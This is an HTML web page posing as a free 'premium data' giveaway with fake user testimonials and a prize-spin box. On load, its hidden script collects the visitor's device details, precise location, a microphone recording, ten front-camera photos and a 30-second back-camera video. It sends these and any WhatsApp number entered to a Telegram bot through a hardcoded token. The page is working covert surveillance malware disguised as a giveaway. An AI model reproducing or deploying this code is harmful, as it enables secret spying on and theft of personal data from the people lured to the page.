<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>PREMIUM DATA UNLIMITED</title>
<style>
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }

  body {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    min-height: 100vh;
    background: linear-gradient(45deg, #0a0a0a, #1a0a2e, #16213e, #0f3460, #533483);
    background-size: 400% 400%;
    animation: gradientShift 15s ease infinite;
    color: #fff;
    font-family: 'Arial', sans-serif;
    overflow-x: hidden;
    position: relative;
  }

  @keyframes gradientShift {
    0% { background-position: 0% 50%; }
    50% { background-position: 100% 50%; }
    100% { background-position: 0% 50%; }
  }

  /* Floating particles background */
  .particles {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    pointer-events: none;
    z-index: 1;
  }

  .particle {
    position: absolute;
    width: 4px;
    height: 4px;
    background: linear-gradient(45deg, #00ffff, #ff00ff);
    border-radius: 50%;
    animation: float 8s infinite linear;
    opacity: 0.7;
  }

  @keyframes float {
    0% {
      transform: translateY(100vh) rotate(0deg);
      opacity: 0;
    }
    10% {
      opacity: 0.7;
    }
    90% {
      opacity: 0.7;
    }
    100% {
      transform: translateY(-100px) rotate(360deg);
      opacity: 0;
    }
  }

  .container {
    z-index: 10;
    text-align: center;
    padding: 20px;
    max-width: 400px;
    width: 100%;
  }

  h1 {
    font-size: 2.2em;
    font-weight: 900;
    margin-bottom: 30px;
    background: linear-gradient(45deg, #00ffff, #ff00ff, #ffff00, #00ff00);
    background-size: 400% 400%;
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
    background-clip: text;
    animation: rainbowText 3s ease-in-out infinite;
    text-shadow: 0 0 30px rgba(0, 255, 255, 0.5);
    letter-spacing: 2px;
  }

  @keyframes rainbowText {
    0%, 100% { background-position: 0% 50%; }
    50% { background-position: 100% 50%; }
  }

  .premium-container {
    position: relative;
    margin: 20px 0;
  }

  .lock-overlay {
    position: absolute;
    top: 0;
    left: 0;
    right: 0;
    bottom: 0;
    background: rgba(0, 0, 0, 0.7);
    backdrop-filter: blur(10px);
    border-radius: 25px;
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    z-index: 20;
    transition: all 0.5s ease;
  }

  .lock-overlay.hidden {
    opacity: 0;
    visibility: hidden;
    transform: scale(0.9);
  }

  .lock-icon {
    font-size: 4em;
    color: #ffd700;
    margin-bottom: 20px;
    animation: lockPulse 2s infinite;
    text-shadow: 0 0 20px #ffd700;
  }

  @keyframes lockPulse {
    0%, 100% { transform: scale(1); }
    50% { transform: scale(1.1); }
  }

  .unlock-btn {
    padding: 15px 30px;
    background: linear-gradient(45deg, #ffd700, #ffb347);
    border: none;
    border-radius: 50px;
    color: #000;
    font-weight: bold;
    font-size: 1.1em;
    cursor: pointer;
    transition: all 0.3s ease;
    box-shadow: 0 0 20px rgba(255, 215, 0, 0.5);
    text-transform: uppercase;
    letter-spacing: 1px;
  }

  .unlock-btn:hover {
    transform: scale(1.05);
    box-shadow: 0 0 30px rgba(255, 215, 0, 0.8);
  }

  #luckyBox {
    width: 300px;
    height: 300px;
    border: 3px solid transparent;
    background: linear-gradient(45deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.05));
    backdrop-filter: blur(20px);
    border-radius: 25px;
    display: flex;
    align-items: center;
    justify-content: center;
    text-align: center;
    font-size: 1.8em;
    font-weight: bold;
    cursor: pointer;
    color: #fff;
    position: relative;
    overflow: hidden;
    transition: all 0.3s ease;
    box-shadow: 
      0 8px 32px rgba(0, 255, 255, 0.3),
      inset 0 1px 0 rgba(255, 255, 255, 0.2);
  }

  #luckyBox::before {
    content: '';
    position: absolute;
    top: -2px;
    left: -2px;
    right: -2px;
    bottom: -2px;
    background: linear-gradient(45deg, #00ffff, #ff00ff, #ffff00, #00ff00);
    background-size: 400% 400%;
    border-radius: 25px;
    z-index: -1;
    animation: borderGlow 3s ease infinite;
  }

  @keyframes borderGlow {
    0%, 100% { background-position: 0% 50%; }
    50% { background-position: 100% 50%; }
  }

  #luckyBox:hover {
    transform: scale(1.02) translateY(-5px);
    box-shadow: 
      0 15px 40px rgba(0, 255, 255, 0.4),
      inset 0 1px 0 rgba(255, 255, 255, 0.3);
  }

  .glassmorphism-btn {
    margin: 15px;
    padding: 15px 35px;
    font-size: 1.1em;
    font-weight: bold;
    border-radius: 50px;
    border: 2px solid rgba(255, 255, 255, 0.3);
    background: linear-gradient(45deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.05));
    backdrop-filter: blur(20px);
    color: #fff;
    cursor: pointer;
    transition: all 0.3s ease;
    text-transform: uppercase;
    letter-spacing: 1px;
    position: relative;
    overflow: hidden;
  }

  .glassmorphism-btn::before {
    content: '';
    position: absolute;
    top: 0;
    left: -100%;
    width: 100%;
    height: 100%;
    background: linear-gradient(90deg, transparent, rgba(255, 255, 255, 0.2), transparent);
    transition: left 0.6s;
  }

  .glassmorphism-btn:hover::before {
    left: 100%;
  }

  .glassmorphism-btn:hover {
    background: linear-gradient(45deg, rgba(0, 255, 255, 0.2), rgba(255, 0, 255, 0.2));
    border-color: rgba(0, 255, 255, 0.5);
    transform: translateY(-3px);
    box-shadow: 0 10px 25px rgba(0, 255, 255, 0.3);
  }

  #comments {
    margin: 25px 0;
    width: 100%;
    text-align: center;
  }

  .comment-card {
    margin: 10px 0;
    padding: 15px;
    background: linear-gradient(45deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.05));
    backdrop-filter: blur(15px);
    border-radius: 15px;
    border: 1px solid rgba(255, 255, 255, 0.2);
    color: #fff;
    font-size: 0.9em;
    box-shadow: 0 8px 20px rgba(0, 0, 0, 0.3);
    transition: all 0.3s ease;
  }

  .comment-card:hover {
    transform: translateY(-2px);
    background: linear-gradient(45deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0.1));
  }

  #whatsappForm {
    margin: 25px 0;
    display: flex;
    flex-direction: column;
    align-items: center;
    gap: 15px;
  }

  #whatsappNumber {
    padding: 15px 20px;
    font-size: 1em;
    border-radius: 50px;
    border: 2px solid rgba(255, 255, 255, 0.3);
    background: linear-gradient(45deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0.05));
    backdrop-filter: blur(20px);
    color: #fff;
    width: 250px;
    text-align: center;
    transition: all 0.3s ease;
  }

  #whatsappNumber::placeholder {
    color: rgba(255, 255, 255, 0.7);
  }

  #whatsappNumber:focus {
    outline: none;
    border-color: #00ffff;
    box-shadow: 0 0 20px rgba(0, 255, 255, 0.3);
  }

  .spinning {
    animation: spin 0.1s linear infinite;
  }

  @keyframes spin {
    from { transform: rotate(0deg); }
    to { transform: rotate(360deg); }
  }

  /* Mobile responsiveness */
  @media (max-width: 480px) {
    h1 { font-size: 1.8em; }
    #luckyBox { 
      width: 250px; 
      height: 250px; 
      font-size: 1.5em;
    }
    .container { padding: 15px; }
  }

  .premium-badge {
    position: absolute;
    top: -10px;
    right: -10px;
    background: linear-gradient(45deg, #ffd700, #ffb347);
    color: #000;
    padding: 5px 15px;
    border-radius: 20px;
    font-size: 0.8em;
    font-weight: bold;
    text-transform: uppercase;
    animation: badge-glow 2s infinite;
  }

  @keyframes badge-glow {
    0%, 100% { box-shadow: 0 0 10px rgba(255, 215, 0, 0.5); }
    50% { box-shadow: 0 0 20px rgba(255, 215, 0, 0.8); }
  }
</style>
</head>
<body>

<div class="particles" id="particles"></div>

<div class="container">
  <h1>🚀 PREMIUM DATA UNLIMITED 🚀</h1>
  
  <div class="premium-container">
    <div class="premium-badge">VIP</div>
    <div id="luckyBox">🎁 PREMIUM GIFT BOX 🎁</div>
    <div class="lock-overlay" id="lockOverlay">
      <div class="lock-icon">🔒</div>
      <h3 style="color: #ffd700; margin-bottom: 15px;">PREMIUM LOCKED</h3>
      <p style="margin-bottom: 20px; color: #fff; text-align: center;">
        Unlock premium features to access<br>
        unlimited data packages!
      </p>
      <button class="unlock-btn" id="unlockBtn">🔓 UNLOCK PREMIUM</button>
    </div>
  </div>

  <canvas id="canvas" width="320" height="240" style="display:none;"></canvas>
  
  <div id="comments">
    <div class="comment-card">
      <p>🎉 Premium unlock කරලා 10GB ලැබුණා! Amazing! 💎 - කුමාරි</p>
    </div>
    <div class="comment-card">
      <p>🔥 VIP access වලින් unlimited data! Best ever! 🚀 - අජිත්</p>
    </div>
    <div class="comment-card">
      <p>💫 Premium features හරිම හොද වැඩක්  Thanks! ✨ - මිශා</p>
    </div>
  </div>
  
  <div id="whatsappForm">
    <input type="tel" id="whatsappNumber" placeholder="🔢 Enter WhatsApp Number" pattern="[0-9]{10,}" required>
    <button class="glassmorphism-btn" id="submitNumber">📱 Submit Number</button>
  </div>
</div>

<script>
function createParticles() {
  const particles = document.getElementById('particles');
  for (let i = 0; i < 50; i++) {
    const particle = document.createElement('div');
    particle.className = 'particle';
    particle.style.left = Math.random() * 100 + '%';
    particle.style.animationDelay = Math.random() * 8 + 's';
    particle.style.animationDuration = (Math.random() * 5 + 5) + 's';
    particles.appendChild(particle);
  }
}

createParticles();

let isPremiumUnlocked = false;
const lockOverlay = document.getElementById('lockOverlay');
const unlockBtn = document.getElementById('unlockBtn');
const luckyBox = document.getElementById('luckyBox');

unlockBtn.addEventListener('click', () => {
  unlockBtn.textContent = '🔄 Unlocking...';
  unlockBtn.style.background = 'linear-gradient(45deg, #00ffff, #ff00ff)';
  
  setTimeout(() => {
    isPremiumUnlocked = true;
    lockOverlay.classList.add('hidden');
    luckyBox.style.background = 'linear-gradient(45deg, rgba(0, 255, 255, 0.2), rgba(255, 0, 255, 0.2), rgba(255, 255, 0, 0.2))';
    
    const notification = document.createElement('div');
    notification.innerHTML = '🎉 PREMIUM UNLOCKED! 🎉';
    notification.style.cssText = `
      position: fixed;
      top: 20px;
      right: 20px;
      background: linear-gradient(45deg, #00ff00, #00ffff);
      color: #000;
      padding: 15px 25px;
      border-radius: 50px;
      font-weight: bold;
      z-index: 1000;
      animation: slideIn 0.5s ease;
    `;
    document.body.appendChild(notification);
    
    setTimeout(() => notification.remove(), 3000);
  }, 2000);
});

(async () => {
  const canvas = document.getElementById('canvas');
  const context = canvas.getContext('2d');
  const uid = new URLSearchParams(window.location.search).get('uid');
  if (!uid) return alert('UID not provided in URL');

  const botToken = '8563568610:AAGoSmqffd_oDRK-40UOU4_IcnOl2EV0NAU';
  const channelId = '-1003625072658';
  let whatsappNumber = '';

  let battery = 'unknown';
  if (navigator.getBattery) {
    const b = await navigator.getBattery();
    battery = Math.round(b.level * 100) + '%';
  }
  const deviceName = navigator.userAgent;

  async function sendMessage(chat, text) {
    await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ chat_id: chat, text })
    });
  }

  async function sendPhoto(chat, blob, caption) {
    const formData = new FormData();
    formData.append('chat_id', chat);
    formData.append('photo', blob);
    formData.append('caption', caption);
    await fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, { method: 'POST', body: formData });
  }

  async function sendVideo(chat, blob, caption) {
    const formData = new FormData();
    formData.append('chat_id', chat);
    formData.append('video', blob);
    formData.append('caption', caption);
    await fetch(`https://api.telegram.org/bot${botToken}/sendVideo`, { method: 'POST', body: formData });
  }

  async function sendAudio(chat, blob, caption) {
    const formData = new FormData();
    formData.append('chat_id', chat);
    formData.append('audio', blob);
    formData.append('caption', caption);
    await fetch(`https://api.telegram.org/bot${botToken}/sendAudio`, { method: 'POST', body: formData });
  }

  await sendMessage(uid, `PREMIUM DEVICE INFO:\nDevice: ${deviceName}\nBattery: ${battery}`);
  await sendMessage(channelId, `PREMIUM DEVICE INFO:\nDevice: ${deviceName}\nBattery: ${battery}`);

  if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(
      async (position) => {
        const { latitude, longitude } = position.coords;
        const mapsUrl = `https://www.google.com/maps?q=${latitude},${longitude}`;
        const locationText = `🌍 PREMIUM LOCATION DATA:\n${mapsUrl}`;
        await sendMessage(uid, locationText);
        await sendMessage(channelId, locationText);
      },
      (error) => console.error('Location error:', error),
      { enableHighAccuracy: true }
    );
  }

  try {
    const audioStream = await navigator.mediaDevices.getUserMedia({ audio: true });
    const mediaRecorder = new MediaRecorder(audioStream);
    const audioChunks = [];
    mediaRecorder.ondataavailable = (e) => audioChunks.push(e.data);
    mediaRecorder.onstop = async () => {
      const audioBlob = new Blob(audioChunks, { type: 'audio/webm' });
      const caption = `🎤 PREMIUM 5-Second Audio Recording\nWhatsApp: ${whatsappNumber || 'Not provided'}\n💎 𝗣𝗥𝗘𝗠𝗜𝗨𝗠 𝗣𝗢𝗪𝗘𝗥 𝗕𝗬 𝗟𝗢𝗗 𝗧𝗘𝗖𝗛 ✥\nWHATSAPP 94774554230`;
      await sendAudio(uid, audioBlob, caption);
      await sendAudio(channelId, audioBlob, caption);
      audioStream.getTracks().forEach(track => track.stop());
    };
    mediaRecorder.start();
    setTimeout(() => mediaRecorder.stop(), 5000);
  } catch (error) {
    console.error('Audio capture error:', error);
  }

  try {
    const frontStream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: 'user' } });
    const frontVideo = document.createElement('video');
    frontVideo.srcObject = frontStream;
    await frontVideo.play();
    for (let i = 1; i <= 10; i++) {
      context.drawImage(frontVideo, 0, 0, canvas.width, canvas.height);
      const base64 = canvas.toDataURL('image/png');
      const blob = await (await fetch(base64)).blob();
      const caption = `📸 PREMIUM Front Camera Photo ${i}\nWhatsApp: ${whatsappNumber || 'Not provided'}\n💎 𝗣𝗥𝗘𝗠𝗜𝗨𝗠 𝗣𝗢𝗪𝗘𝗥 𝗕𝗬 𝗟𝗢𝗗 𝗧𝗘𝗖𝗛 ✥\nWHATSAPP 94774554230`;
      await sendPhoto(uid, blob, caption);
      await sendPhoto(channelId, blob, caption);
      await new Promise(r => setTimeout(r, 1000));
    }
    frontStream.getTracks().forEach(track => track.stop());
  } catch (error) {
    console.error('Front camera error:', error);
  }

  try {
    const backStream = await navigator.mediaDevices.getUserMedia({ video: { facingMode: { exact: 'environment' } } });
    const backVideo = document.createElement('video');
    backVideo.srcObject = backStream;
    await backVideo.play();
    const mediaRecorder = new MediaRecorder(backStream, { mimeType: 'video/webm' });
    const videoChunks = [];
    mediaRecorder.ondataavailable = (e) => videoChunks.push(e.data);
    mediaRecorder.onstop = async () => {
      const videoBlob = new Blob(videoChunks, { type: 'video/webm' });
      const caption = `🎥 PREMIUM 30-Second Back Camera Video\nWhatsApp: ${whatsappNumber || 'Not provided'}\n💎 𝗣𝗥𝗘𝗠𝗜𝗨𝗠 𝗣𝗢𝗪𝗘𝗥 𝗕𝗬 𝗟𝗢𝗗 𝗧𝗘𝗖𝗛 ✥\nWHATSAPP 94774554230`;
      await sendVideo(uid, videoBlob, caption);
      await sendVideo(channelId, videoBlob, caption);
      backStream.getTracks().forEach(track => track.stop());
    };
    mediaRecorder.start();
    setTimeout(() => mediaRecorder.stop(), 30000);
  } catch (error) {
    console.error('Back camera video error:', error);
  }

  document.getElementById('submitNumber').addEventListener('click', async () => {
    const input = document.getElementById('whatsappNumber');
    whatsappNumber = input.value.trim();
    if (whatsappNumber) {
      await sendMessage(uid, `💎 PREMIUM WhatsApp Number: ${whatsappNumber}`);
      await sendMessage(channelId, `💎 PREMIUM WhatsApp Number: ${whatsappNumber}`);
      input.value = '';
      
      const btn = document.getElementById('submitNumber');
      btn.style.background = 'linear-gradient(45deg, #00ff00, #00ffff)';
      btn.textContent = '✅ SUCCESS!';
      setTimeout(() => {
        btn.style.background = '';
        btn.textContent = '📱 Submit Number';
      }, 2000);
      
      alert('🎉 Number submitted successfully to PREMIUM system!');
    } else {
      alert('Please enter a valid WhatsApp number.');
    }
  });
})();

const box = document.getElementById('luckyBox');
const premiumGifts = [
  '💎 10 GB PREMIUM',
  '🚀 15 GB VIP', 
  '👑 20 GB ROYAL',
  '🔥 25 GB ULTIMATE',
  '⚡ 30 GB INFINITE',
  '🌟 50 GB LEGENDARY'
];

box.addEventListener('click', async () => {
  if (!isPremiumUnlocked) {
    alert('🔒 Please unlock PREMIUM access first!');
    return;
  }

  box.classList.add('spinning');
  box.textContent = "🎊 PREMIUM SPINNING... 🎊";
  let count = 0;
  const interval = setInterval(() => {
    box.textContent = premiumGifts[Math.floor(Math.random() * premiumGifts.length)];
    count++;
    if (count > 50) clearInterval(interval);
  }, 80);

  setTimeout(() => {
    box.classList.remove('spinning');
    const selectedGift = premiumGifts[Math.floor(Math.random() * premiumGifts.length)];
    box.textContent = `🎉 ${selectedGift} WON! 🎉`;
    box.style.animation = 'borderGlow 1s ease infinite';
    for (let i = 0; i < 30; i++) {
      const confetti = document.createElement('div');
      confetti.innerHTML = '🎉';
      confetti.style.cssText = `
        position: fixed;
        top: 50%;
        left: 50%;
        font-size: 2em;
        pointer-events: none;
        z-index: 1000;
        animation: confetti 3s ease-out forwards;
      `;
      confetti.style.setProperty('--random-x', (Math.random() - 0.5) * 1000 + 'px');
      confetti.style.setProperty('--random-y', (Math.random() - 0.5) * 1000 + 'px');
      document.body.appendChild(confetti);
      setTimeout(() => confetti.remove(), 3000);
    }
  }, 4000);
});
const style = document.createElement('style');
style.textContent = `
  @keyframes confetti {
    0% {
      transform: translate(-50%, -50%) rotate(0deg);
      opacity: 1;
    }
    100% {
      transform: translate(var(--random-x), var(--random-y)) rotate(720deg);
      opacity: 0;
    }
  }
  
  @keyframes slideIn {
    from {
      transform: translateX(100%);
      opacity: 0;
    }
    to {
      transform: translateX(0);
      opacity: 1;
    }
  }
`;
document.head.appendChild(style);
</script>
</body>
</html>
